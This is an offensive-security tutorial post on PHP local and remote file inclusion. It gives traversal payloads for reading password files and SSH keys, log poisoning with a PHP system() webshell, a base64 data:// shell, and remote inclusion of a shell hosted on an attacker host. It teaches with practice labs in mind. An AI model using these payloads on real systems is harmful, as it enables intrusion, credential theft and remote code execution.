Post 7: Local & Remote File Inclusion (LFI/RFI)
Reading, Poisoning, and Exploiting Server-Side Files
File inclusion vulnerabilities happen when a web application loads files based on user input — and doesn’t validate or sanitize that input properly. These bugs can let you:
- Read sensitive files like
/etc/passwdorwp-config.php - Access logs or backups
- Trigger RCE through log poisoning or wrapper abuse
- Include remote scripts (if RFI is enabled)
Table of Contents
- What is LFI and RFI?
- How to Identify File Inclusion
- Testing for LFI
- Reading Sensitive Files
- Log Poisoning for RCE
- Wrappers and Advanced LFI
- Remote File Inclusion (RFI)
- Tools, Tips, and Practice
1. What is LFI and RFI?
LFI (Local File Inclusion)
The app loads files from the local system based on user input.
Example:
http://target.com/index.php?page=about
If you can modify the page parameter to include other files on the server:
http://target.com/index.php?page=../../../../etc/passwd
RFI (Remote File Inclusion)
The app loads files from external URLs — allowing you to include malicious scripts:
http://target.com/index.php?page=http://attacker.com/shell.txt
Note: RFI is mostly deprecated on modern PHP installs due to hardened configs, but still seen in legacy apps or misconfigs.
2. How to Identify File Inclusion
Look for:
- Parameters like
page=,file=,lang=,template= - URLs that load content dynamically
- Errors that mention “failed to open stream” or “include()” functions
Try:
page=about
page=../../../../etc/passwd
page=../../../../../../../../../../etc/passwd
3. Testing for LFI
UNIX-style:
../../../../etc/passwd
Windows-style:
../../../../boot.ini
Use null byte in older systems (pre-PHP 5.3):
../../../../etc/passwd%00
Try with extensions:
?page=../../../../etc/passwd.txt
?page=../../../../etc/passwd%00.php
4. Reading Sensitive Files
Common targets:
/etc/passwd— user accounts/var/log/apache2/access.log— access logs for poisoning/proc/self/environ— contains environment variableswp-config.php— WordPress credentials.ssh/id_rsa— SSH private keys
Try wrapping the request in Burp Suite and playing with traversal depth.
5. Log Poisoning for RCE
If you can write to logs (e.g., via your User-Agent or Referer), and then include the log file, you can trigger RCE.
Step 1: Send malicious input
Use curl or Burp to set a malicious User-Agent:
curl -A "<?php system($_GET['cmd']); ?>" http://target.com
Step 2: Include the log
Try:
?page=../../../../var/log/apache2/access.log
Step 3: Trigger RCE
http://target.com?page=.../access.log&cmd=id
6. Wrappers and Advanced LFI
php://filter
Allows you to base64-encode file output.
Example:
?page=php://filter/convert.base64-encode/resource=config.php
Decode the output to read files even if they have errors or unreadable characters.
data:// and expect://
Less commonly enabled, but can be abused to execute code in some rare cases:
?page=data:text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NdKTsgPz4=
(This is a base64-encoded PHP payload.)
7. Remote File Inclusion (RFI)
If RFI is allowed (allow_url_include = On in php.ini), include a remote script.
Step 1: Create a PHP shell on your attacker box
<?php system($_GET['cmd']); ?>
Host it with:
php -S 0.0.0.0:8000
Step 2: Call it from the vulnerable site
?page=http://your-ip:8000/shell.txt&cmd=whoami
If successful, you’ll get command output directly in the response.
8. Tools, Tips, and Practice
Tools:
- Burp Suite – Ideal for testing and manipulating parameters
- ffuf – Fuzz known file paths
- wfuzz – Great for wrapper and traversal testing
Tips:
- Always test full traversal depth
- Use log poisoning if direct RCE isn’t available
- If you get errors but no output, try
php://filter - Combine with file upload for post-upload LFI shell
Practice Labs:
- TryHackMe: LFI room, Vulnversity
- PortSwigger: File inclusion labs
- DVWA and bWAPP: File inclusion modules
- HackTheBox: Boxes with
file inclusion,web,shell
Coming Up Next
Post 8: Session & Cookie Attacks
We’ll go into:
- Session fixation
- Cookie tampering
- Token prediction
- Hijacking and impersonation via insecure session handling
